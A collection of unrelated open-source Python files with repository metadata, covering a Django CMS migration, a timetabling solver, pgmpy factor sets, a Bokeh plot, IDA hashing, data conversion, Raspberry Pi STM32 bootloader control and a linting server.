'creation_date': ('models.DateTimeField', [], {'default': 'datetime.datetime(2009, 7, 14, 7, 37, 26, 379713)'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'in_navigation': ('models.BooleanField', [], {'default': 'True', 'blank': 'True', 'db_index': 'True'}),
'level': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'login_required': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'mark_delete': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'moderator_state': ('models.SmallIntegerField', [], {'default': '1', 'blank': 'True'}),
'navigation_extenders': ('models.CharField', [], {'blank': 'True', 'max_length': '80', 'null': 'True', 'db_index': 'True'}),
'parent': ('models.ForeignKey', [], {'related_name': "'children'", 'null': 'True', 'to': "orm['cms.PagePublic']", 'blank': 'True'}),
'publication_date': ('models.DateTimeField', [], {'blank': 'True', 'null': 'True', 'db_index': 'True'}),
'publication_end_date': ('models.DateTimeField', [], {'blank': 'True', 'null': 'True', 'db_index': 'True'}),
'published': ('models.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'reverse_id': ('models.CharField', [], {'blank': 'True', 'max_length': '40', 'null': 'True', 'db_index': 'True'}),
'rght': ('models.PositiveIntegerField', [], {'db_index': 'True'}),
'site': ('models.ForeignKey', [], {'to': "orm['sites.Site']"}),
'soft_root': ('models.BooleanField', [], {'default': 'False', 'blank': 'True', 'db_index': 'True'}),
'template': ('models.CharField', [], {'max_length': '100'}),
'tree_id': ('models.PositiveIntegerField', [], {'db_index': 'True'})
},
'googlemap.googlemap': {
'Meta': {'db_table': "'cmsplugin_googlemap'"},
'address': ('models.CharField', [], {'max_length': '150'}),
'city': ('models.CharField', [], {'max_length': '100'}),
'cmsplugin_ptr': ('models.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}),
'content': ('models.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'title': ('models.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'zipcode': ('models.CharField', [], {'max_length': '30'}),
'zoom': ('models.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'googlemap.googlemappublic': {
'address': 'models.CharField(max_length=150)',
'city': 'models.CharField(max_length=100)',
'cmspluginpublic_ptr': "models.OneToOneField(to=orm['cms.CMSPluginPublic'], unique=True, primary_key=True)",
'content': 'models.CharField(max_length=255, null=True, blank=True)',
'mark_delete': 'models.BooleanField(default=False, blank=True)',
'title': 'models.CharField(max_length=100, null=True, blank=True)',
'zipcode': 'models.CharField(max_length=30)',
'zoom': 'models.IntegerField(null=True, blank=True)'
},
'sites.site': {
'Meta': {'db_table': "'django_site'"},
'domain': ('models.CharField', [], {'max_length': '100'}),
'id': ('models.AutoField', [], {'primary_key': 'True'}),
'name': ('models.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['googlemap']
|
team-xue/xue
|
xue/cms/plugins/googlemap/migrations/0006_publisher2.py
|
Python
|
bsd-3-clause
| 10,224
|
# coding: utf-8
from __future__ import print_function
import time
from functools import wraps
def timethis(func):
@wraps(func)
def wrapper(*args, **kwargs):
start = time.time()
result = func(*args, **kwargs)
end = time.time()
        print(end - start)
        return result
    return wrapper
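# Thanks to functools.wraps, the decorated function keeps its original
# __name__ and exposes the undecorated function as __wrapped__, which the
# prints below demonstrate.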
@timethis
def test():
time.sleep(1)
print(test.__name__)
print(dir(test))
print(test.__wrapped__)
test()
|
phyng/python-cookbook
|
9.1.py
|
Python
|
mit
| 418
|
""" Curriculum-based course timetabling solver;
solves timetabling problems formulated in .ectt file format (http://tabu.diegm.uniud.it/ctt/)
Copyright (C) 2013 Stephan E. Becker
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>."""
__author__ = 'Stephan Becker'
import math
import data
# hard constraint: Availability
def teacherIsAvailable(event, timeslot):
"""
return True if the teacher of the course is available in the timeslot
"""
if event is None:
return True
for constraint in data.unavailability_constraints:
if event.id == constraint.courseID and timeslot == constraint.timeslot:
return False
return True
# hard constraint: Lectures (part 2 of 2)
def timeslotHasSameLecture(event, timeslot):
"""
checks if a lecture of the same course is already assigned to this timeslot,
returns True if there is already a lecture of the course in this timeslot
"""
if event is None:
return False
for room in range(data.numberOfRooms):
        if data.timetable[(room, timeslot)] is not None:
if data.timetable[(room, timeslot)].id == event.id:
return True
return False
def timeslotHasSameTeacher(event, timeslot):
"""
checks if a course with the same teacher is already assigned to this timeslot,
returns True if there is
"""
if event is None:
return False
for room in range(data.numberOfRooms):
currentEv = data.timetable[(room, timeslot)] # is the current course also taught by this teacher?
        if currentEv is not None:
if currentEv.id in data.teachers[event.teacher]:
return True
return False
def timeslotHasSameCurriculum(event, timeslot):
"""
checks if a course in the same timeslot is part of the same curriculum
returns True if it is
"""
if event is None:
return False
curriculaOfEvent = data.coursesToCurricula[event.id] # which curricula is this course part of?
for room in range(data.numberOfRooms):
currentEv = data.timetable[(room, timeslot)]
        if currentEv is not None:
for cu in curriculaOfEvent: # checks whether the current course is also part of the same curriculum
if currentEv.id in data.curriculaToCourses[cu]:
return True
return False
def assignCourseToPosition(course, position):
"""
assign the course to the position in the timetable
"""
# if data.timetable[position] is None and courseFitsIntoTimeslot(course, position[1]):
data.timetable[position] = course
data.emptyPositions.remove(position)
data.forbiddenPositions.append(position)
def removeCourseAtPosition(position):
"""
remove the course which was assigned at the position from the timetable
and add it to unassigned events
returns the removed course
"""
ev = data.timetable[position]
    if ev is not None:
data.timetable[position] = None
data.emptyPositions.append(position)
return ev
def courseFitsIntoTimeslot(course, timeslot):
return not timeslotHasSameLecture(course, timeslot) and teacherIsAvailable(course, timeslot) \
and not timeslotHasSameTeacher(course, timeslot) and not timeslotHasSameCurriculum(course, timeslot)
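# A minimal usage sketch tying the checks together (position is a
# (room, timeslot) tuple, as used throughout this module):
#   if data.timetable[position] is None and courseFitsIntoTimeslot(course, position[1]):
#       assignCourseToPosition(course, position)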
|
stBecker/CB-CTT_Solver
|
Course timetabling solver/hard.py
|
Python
|
gpl-3.0
| 3,933
|
from .geo_dundee import GeoSatelliteDataDundee
from .geo_jma import GeoSatelliteDataJMA
from .polar import PolarSatelliteData
from .satellites import Satellites
from .mkdir import mkdir_p
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
|
jmozmoz/cloudmap
|
cloudmap/__init__.py
|
Python
|
gpl-3.0
| 289
|
#!/usr/bin/env python3
from functools import reduce
from pgmpy.factors.base import BaseFactor
class FactorSet(object):
r"""
Base class of *DiscreteFactor Sets*.
    A factor set provides a compact representation of the higher dimensional factor
    :math:`\phi_1\cdot\phi_2\cdots\phi_n`.
For example the factor set corresponding to factor :math:`\phi_1\cdot\phi_2` would be the union of the factors
:math:`\phi_1` and :math:`\phi_2` i.e. factor set :math:`\vec\phi = \phi_1 \cup \phi_2`.
"""
def __init__(self, *factors_list):
"""
Initialize the factor set class.
Parameters
----------
factors_list: Factor1, Factor2, ....
All the factors whose product is represented by the factor set
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set = FactorSet(phi1, phi2)
>>> factor_set
<pgmpy.factors.FactorSet.FactorSet at 0x7f8e32af6d50>
>>> print(factor_set)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b4c2d0>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b4c710>])
"""
if not all(isinstance(phi, BaseFactor) for phi in factors_list):
raise TypeError("Input parameters must be child classes of BaseFactor")
self.factors = set([factor.copy() for factor in factors_list])
def add_factors(self, *factors):
"""
Adds factors to the factor set.
Parameters
----------
factors: Factor1, Factor2, ...., Factorn
factors to be added into the factor set
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set1.add_factors(phi3, phi4)
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b4ca10>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e4c393690>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b4c750>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b4cb50>])
"""
self.factors.update(factors)
def remove_factors(self, *factors):
"""
Removes factors from the factor set.
Parameters
----------
factors: Factor1, Factor2, ...., Factorn
factors to be removed from the factor set
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> factor_set1.add_factors(phi3)
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b5b050>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b250>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b5b150>])
>>> factor_set1.remove_factors(phi1, phi2)
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b4cb10>])
"""
for factor in factors:
self.factors.remove(factor)
def get_factors(self):
"""
Returns all the factors present in factor set.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> factor_set1.add_factors(phi3)
>>> factor_set1.get_factors()
{<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f827c0a23c8>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f827c0a2358>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f825243f9e8>}
"""
return self.factors
def product(self, factorset, inplace=True):
r"""
        Return the product of this factor set with the given factor set.
        Suppose :math:`\vec\phi_1` and :math:`\vec\phi_2` are two factor sets, then their product is another
        factor set :math:`\vec\phi_3 = \vec\phi_1 \cup \vec\phi_2`.
Parameters
----------
        factorset: FactorSet
            The factor set to be multiplied with.
        inplace: boolean (Default value True)
            If inplace = True, it will modify the FactorSet object itself; if False, it will
            return a new FactorSet object.
Returns
        -------
        If inplace = False, will return a new FactorSet object, which is the product of the
        two factor sets.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> print(factor_set2)
set([<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b050>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b690>])
>>> factor_set2.product(factor_set1)
>>> print(factor_set2)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b4c910>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b4cc50>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b050>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b690>])
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factor_set2.product(factor_set1, inplace=False)
>>> print(factor_set2)
set([<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b060>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b790>])
"""
factor_set = self if inplace else self.copy()
factor_set1 = factorset.copy()
factor_set.add_factors(*factor_set1.factors)
if not inplace:
return factor_set
def divide(self, factorset, inplace=True):
r"""
Returns a new factor set instance after division by the factor set
Division of two factor sets :math:`\frac{\vec\phi_1}{\vec\phi_2}` basically translates to union of all the
        factors present in :math:`\vec\phi_1` and :math:`\frac{1}{\phi_i}` of all the factors present in
:math:`\vec\phi_2`.
Parameters
----------
factorset: FactorSet
The divisor
        inplace: boolean (Default value True)
            If inplace = True, it will modify the FactorSet object itself; if False, it will
            return a new FactorSet object.
Returns
        -------
        If inplace = False, will return a new FactorSet object which is the division of the
        two factor sets.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factor_set2.divide(factor_set1)
>>> print(factor_set3)
set([<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f8e32b5ba10>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f8e32b5b650>,
<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f8e32b5b050>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f8e32b5b8d0>])
"""
factor_set = self if inplace else self.copy()
factor_set1 = factorset.copy()
factor_set.add_factors(
*[phi.identity_factor() / phi for phi in factor_set1.factors]
)
if not inplace:
return factor_set
def marginalize(self, variables, inplace=True):
"""
        Marginalizes the factors present in the factor set with respect to the given variables.
Parameters
----------
variables: list, array-like
List of the variables to be marginalized.
inplace: boolean (Default value True)
            If inplace = True, it will modify the factor set itself; otherwise it will create a new factor set.
Returns
-------
If inplace = False, will return a new marginalized FactorSet object.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> factor_set1.marginalize('x1')
>>> print(factor_set1)
set([<DiscreteFactor representing phi(x2:3, x3:2) at 0x7f8e32b4cc10>,
<DiscreteFactor representing phi(x3:2, x4:2) at 0x7f8e32b4cf90>])
"""
if isinstance(variables, str):
raise TypeError("Expected list or array-like type got type str")
factor_set = self if inplace else self.copy()
factors_to_be_marginalized = set(
filter(lambda x: set(x.scope()).intersection(variables), factor_set.factors)
)
for factor in factors_to_be_marginalized:
variables_to_be_marginalized = list(
set(factor.scope()).intersection(variables)
)
if inplace:
factor.marginalize(variables_to_be_marginalized, inplace=True)
else:
factor_set.remove_factors(factor)
factor_set.add_factors(
factor.marginalize(variables_to_be_marginalized, inplace=False)
)
if not inplace:
return factor_set
    def __mul__(self, other):
        return self.product(other, inplace=False)
    def __truediv__(self, other):
        return self.divide(other, inplace=False)
def __str__(self):
return self.factors.__str__()
def copy(self):
"""
Create a copy of factor set.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set = FactorSet(phi1, phi2)
>>> factor_set
<pgmpy.factors.FactorSet.FactorSet at 0x7fa68f390320>
>>> factor_set_copy = factor_set.copy()
>>> factor_set_copy
<pgmpy.factors.FactorSet.FactorSet at 0x7f91a0031160>
"""
# No need to have copies of factors as argument because __init__ method creates copies.
return FactorSet(*self.factors)
def factorset_product(*factorsets_list):
r"""
Base method used for product of factor sets.
    Suppose :math:`\vec\phi_1` and :math:`\vec\phi_2` are two factor sets, then their product is another factor set
:math:`\vec\phi_3 = \vec\phi_1 \cup \vec\phi_2`.
Parameters
----------
factorsets_list: FactorSet1, FactorSet2, ..., FactorSetn
All the factor sets to be multiplied
Returns
-------
    The product of all the factor sets in factorsets_list.
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> from pgmpy.factors import factorset_product
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factorset_product(factor_set1, factor_set2)
>>> print(factor_set3)
set([<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7fb3a1933e90>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7fb3a1933f10>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7fb3a1933f90>,
<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7fb3a1933e10>])
"""
if not all(isinstance(factorset, FactorSet) for factorset in factorsets_list):
raise TypeError("Input parameters must be FactorSet instances")
return reduce(lambda x, y: x.product(y, inplace=False), factorsets_list)
def factorset_divide(factorset1, factorset2):
r"""
Base method for dividing two factor sets.
    Division of two factor sets :math:`\frac{\vec\phi_1}{\vec\phi_2}` translates to the union of all the factors
    present in :math:`\vec\phi_1` and the reciprocals :math:`\frac{1}{\phi_i}` of all the factors present in :math:`\vec\phi_2`.
Parameters
----------
factorset1: FactorSet
The dividend
factorset2: FactorSet
The divisor
Returns
-------
The division of factorset1 and factorset2
Examples
--------
>>> from pgmpy.factors import FactorSet
>>> from pgmpy.factors.discrete import DiscreteFactor
>>> from pgmpy.factors import factorset_divide
>>> phi1 = DiscreteFactor(['x1', 'x2', 'x3'], [2, 3, 2], range(12))
>>> phi2 = DiscreteFactor(['x3', 'x4', 'x1'], [2, 2, 2], range(8))
>>> factor_set1 = FactorSet(phi1, phi2)
>>> phi3 = DiscreteFactor(['x5', 'x6', 'x7'], [2, 2, 2], range(8))
>>> phi4 = DiscreteFactor(['x5', 'x7', 'x8'], [2, 2, 2], range(8))
>>> factor_set2 = FactorSet(phi3, phi4)
>>> factor_set3 = factorset_divide(factor_set2, factor_set1)
>>> print(factor_set3)
set([<DiscreteFactor representing phi(x3:2, x4:2, x1:2) at 0x7f119ad78f90>,
<DiscreteFactor representing phi(x5:2, x6:2, x7:2) at 0x7f119ad78e50>,
<DiscreteFactor representing phi(x1:2, x2:3, x3:2) at 0x7f119ad78ed0>,
<DiscreteFactor representing phi(x5:2, x7:2, x8:2) at 0x7f119ad78e90>])
"""
if not isinstance(factorset1, FactorSet) or not isinstance(factorset2, FactorSet):
raise TypeError("factorset1 and factorset2 must be FactorSet instances")
return factorset1.divide(factorset2, inplace=False)
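# ---------------------------------------------------------------------------
# Hedged usage sketch (illustrative addition, not part of upstream pgmpy):
# mirrors the docstring examples above with smaller factors. Values start at
# 1 so the element-wise division in divide() never hits a zero.
if __name__ == "__main__":
    from pgmpy.factors.discrete import DiscreteFactor

    phi1 = DiscreteFactor(['x1', 'x2'], [2, 2], range(1, 5))
    phi2 = DiscreteFactor(['x2', 'x3'], [2, 2], range(1, 5))
    fs_a, fs_b = FactorSet(phi1), FactorSet(phi2)
    combined = fs_a.product(fs_b, inplace=False)     # union -> 2 factors
    quotient = combined.divide(fs_b, inplace=False)  # adds 1/phi per divisor factor -> 3 factors
    print(len(combined.factors), len(quotient.factors))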
|
pgmpy/pgmpy
|
pgmpy/factors/FactorSet.py
|
Python
|
mit
| 15,815
|
# The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
import numpy as np
from scipy.integrate import odeint
from bokeh.plotting import *
sigma = 10
rho = 28
beta = 8.0/3
theta = 3 * np.pi / 4
def lorenz(xyz, t):
x, y, z = xyz
x_dot = sigma * (y - x)
y_dot = x * rho - x * z - y
    z_dot = x * y - beta * z
return [x_dot, y_dot, z_dot]
initial = (-10, -7, 35)
t = np.arange(0, 100, 0.001)
solution = odeint(lorenz, initial, t)
x = solution[:, 0]
y = solution[:, 1]
z = solution[:, 2]
xprime = np.cos(theta) * x - np.sin(theta) * y
colors = ["#C6DBEF", "#9ECAE1", "#6BAED6", "#4292C6", "#2171B5", "#08519C", "#08306B",]
output_server("lorenz")
multi_line(np.array_split(xprime, 7), np.array_split(z, 7),
line_color=colors, line_alpha=0.8, line_width=1.5,
tools="pan,wheel_zoom,box_zoom,reset,previewsave", title="lorenz example")
show() # open a browser
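# ---------------------------------------------------------------------------
# Hedged check (illustrative addition, not part of the original example):
# 'xprime' above is the x-component of rotating each (x, y) sample by theta.
# Verify against an explicit 2-D rotation matrix, using only the numpy import
# already present.
R = np.array([[np.cos(theta), -np.sin(theta)],
              [np.sin(theta),  np.cos(theta)]])
assert np.allclose(np.dot(R[0], np.vstack([x, y])), xprime)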
|
the13fools/Bokeh_Examples
|
plotting/server/lorenz.py
|
Python
|
bsd-3-clause
| 936
|
import idautils
import idc
from . import vector
class InstructionHashVector(vector.Vector):
type = 'instruction_hash'
type_version = 0
# The Keleven
# http://movies.stackexchange.com/q/11495
keleven = 17391172068829961267
@staticmethod
def _cycle(h, b):
h |= 5
h ^= b
h *= h
h ^= (h >> 32)
h &= 0xffffffffffffffff
return h
def data(self):
h = self.keleven
for ea in idautils.FuncItems(self.offset):
h = self._cycle(h, idc.Byte(ea))
# go over all additional bytes of any instruction
for i in range(ea + 1, ea + idc.ItemSize(ea)):
h = self._cycle(h, idc.Byte(i))
return h
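# ---------------------------------------------------------------------------
# Hedged sketch (illustrative addition, not part of upstream rematch): the
# keleven mixer above is pure integer arithmetic, so it can be sanity-checked
# without an open IDB. _demo_cycle is a hypothetical helper; bytearray()
# yields ints on both Python 2 and 3.
def _demo_cycle(data=b"\x55\x48\x89\xe5"):  # a common x86-64 function prologue
    h = InstructionHashVector.keleven
    for b in bytearray(data):
        h = InstructionHashVector._cycle(h, b)
    return h  # deterministic 64-bit digest of the byte sequence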
|
nirizr/rematch
|
idaplugin/rematch/collectors/vectors/instruction_hash.py
|
Python
|
gpl-3.0
| 654
|
import os
import numpy as np
from scipy.io import savemat
from config import ECG_eHEALTH_DATA_DIR
SOURCE_DIR = 'trainECG'
TARGET_DIR = 'trainECG_mat'
source_data_path = os.path.join(ECG_eHEALTH_DATA_DIR, SOURCE_DIR)
target_data_path = os.path.join(ECG_eHEALTH_DATA_DIR, TARGET_DIR)
if not os.path.exists(target_data_path):
os.makedirs(target_data_path)
participant_list = os.listdir(source_data_path)
for participant in participant_list:
source_participant_path = os.path.join(source_data_path, participant)
records_list = os.listdir(source_participant_path)
target_participant_dir = os.path.join(target_data_path, participant)
print target_participant_dir
if not os.path.exists(target_participant_dir):
os.makedirs(target_participant_dir)
for record in records_list:
source_record_path = os.path.join(source_data_path, participant, record)
record = record.replace('.npy', '.mat') # update file extension
converted_record_path = os.path.join(target_data_path, participant, record)
ecg_features = np.load(source_record_path)
savemat(converted_record_path, {'ecg_data': ecg_features})
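# ---------------------------------------------------------------------------
# Hedged round-trip sketch (illustrative addition, not part of the original
# script): checks that np.save -> np.load -> savemat -> loadmat preserves one
# synthetic record; only numpy, scipy and tempfile are assumed.
import tempfile
from scipy.io import loadmat
_tmp = tempfile.mkdtemp()
_src = os.path.join(_tmp, 'rec.npy')
_dst = os.path.join(_tmp, 'rec.mat')
np.save(_src, np.arange(5.0))
savemat(_dst, {'ecg_data': np.load(_src)})
assert (loadmat(_dst)['ecg_data'].ravel() == np.arange(5.0)).all()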
|
YuriyKhoma/ecg-identification
|
npy2mat.py
|
Python
|
apache-2.0
| 1,163
|
# -*- coding: utf-8 -*-
import functools
import time
import sys
import os
import os.path
import posixpath
import re
from six import u, moves, print_
from . import TIME_TO_SLEEP
def try_if_empty(count):
assert count >= 1
def outer_decorator(func):
@functools.wraps(func)
def inner_decorator(*args, **kwargs):
for attempt in moves.range(count - 1): # pylint: disable=E1101
try:
result = func(*args, **kwargs)
except Exception as exc: # pylint: disable=W0703
print_(u("[{0}/{1}] Error during parsing: {2}").format(
attempt, count, exc
), file=sys.stderr)
time.sleep(TIME_TO_SLEEP)
else:
return result
return func(*args, **kwargs)
return inner_decorator
return outer_decorator
def script_example_header(func):
@functools.wraps(func)
def decorator(*args, **kwargs):
print_("#!/bin/bash\nset -e", end="\n\n")
if os.getenv("VIRTUAL_ENV"):
script_path = posixpath.join(
os.getenv("VIRTUAL_ENV"), "bin", "activate"
)
print_(u('source {0}').format(printable_path(script_path)),
end="\n\n")
return func(*args, **kwargs)
return decorator
def printable_path(path):
abspath = os.path.abspath(path)
if re.search(r"\s", abspath) is not None:
abspath = '"' + abspath.replace('"', r'\"') + '"'
return abspath
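# ---------------------------------------------------------------------------
# Hedged usage sketch (illustrative addition, not part of upstream
# iblocklist2ipset): a flaky callable retried by try_if_empty. Runnable only
# in the package context, since the relative imports above must resolve; the
# failure counter below is illustrative.
if __name__ == "__main__":
    state = {"failures_left": 2}

    @try_if_empty(3)
    def flaky():
        if state["failures_left"]:
            state["failures_left"] -= 1
            raise ValueError("transient")
        return "ok"

    print_(flaky())  # two logged retries, then "ok"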
|
9seconds/iblocklist2ipset
|
iblocklist2ipset/utils.py
|
Python
|
mit
| 1,566
|
########################################################################
import time, sys
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BOARD)
GPIO.setwarnings(False)
NRST = 7 #GPIO4
BOOT0 = 26 #GPIO7
SHORT = 0.1
LONG = 0.5
VERYLONG = 1.0
def setup():
print "GPIO version: " + str(GPIO.VERSION)
print "Pi revision " + str(GPIO.RPI_REVISION)
def clean():
print "cleaning up..."
GPIO.cleanup()
print "done."
def reset_stm32():
GPIO.setup(NRST, GPIO.OUT) # False for reset
#print "NRST"
GPIO.output(NRST, False)
time.sleep(SHORT)
GPIO.output(NRST, True)
GPIO.setup(NRST, GPIO.IN) # back to input
time.sleep(SHORT)
def enterbootloader():
GPIO.setup(BOOT0, GPIO.OUT) # True for system bootloader
#print "BOOT0"
GPIO.output(BOOT0, True)
time.sleep(SHORT)
reset_stm32()
time.sleep(SHORT)
GPIO.output(BOOT0, False)
time.sleep(SHORT)
GPIO.setup(BOOT0, GPIO.IN) # back to input
def main():
pass
if __name__ == "__main__":
sys.exit(main())
|
ARMinARM/arminarm
|
src/tools/stm32control.py
|
Python
|
gpl-2.0
| 974
|
""" lintswitch lints your code in the background.
http://github.com/grahamking/lintswitch
"""
import sys
import socket
import logging
import os
import os.path
import argparse
from threading import Thread
try:
# python 3
from queue import Queue
except ImportError:
# python 2
from Queue import Queue
from lintswitch import checkers, emitters, http_server
DESC = 'Linting server - https://github.com/grahamking/lintswitch'
LOG = logging.getLogger(__name__)
def main():
"""Start here"""
parser = make_parser()
args = parser.parse_args()
if args.version:
from lintswitch import __version__
print(__version__)
return 0
log_params = {'level': args.loglevel}
if args.logfile:
log_params['filename'] = args.logfile
logging.basicConfig(**log_params) # pylint: disable=W0142
LOG.debug('lintswitch start')
work_queue = Queue()
check_proc = Thread(target=worker,
args=(work_queue, args))
check_proc.daemon = True
check_proc.start()
server = Thread(target=http_server.http_server,
args=(args.httpport,))
server.daemon = True
server.start()
# Listen for connections from vim (or other) plugin
listener = socket.socket()
listener.bind(('127.0.0.1', args.lintport))
listener.listen(10)
try:
main_loop(listener, work_queue)
except KeyboardInterrupt:
listener.close()
print('Bye')
return 0
def make_parser():
"""argparse object which can parse command line arguments,
or print help.
"""
parser = argparse.ArgumentParser(
description=DESC,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'-v', '--version',
action='store_true',
help='Print version info and quit')
parser.add_argument(
'--loglevel',
default='DEBUG',
choices=['DEBUG', 'INFO', 'WARN', 'ERROR', 'FATAL'],
help='One of DEBUG, INFO, WARN, ERROR or FATAL')
parser.add_argument(
'--logfile',
default=None,
help='Full path of log file. Defaults to stdout.')
parser.add_argument(
'--lintport',
type=int,
default=4008,
help='Port to listen for lint requests')
parser.add_argument(
'--httpport',
type=int,
default=8008,
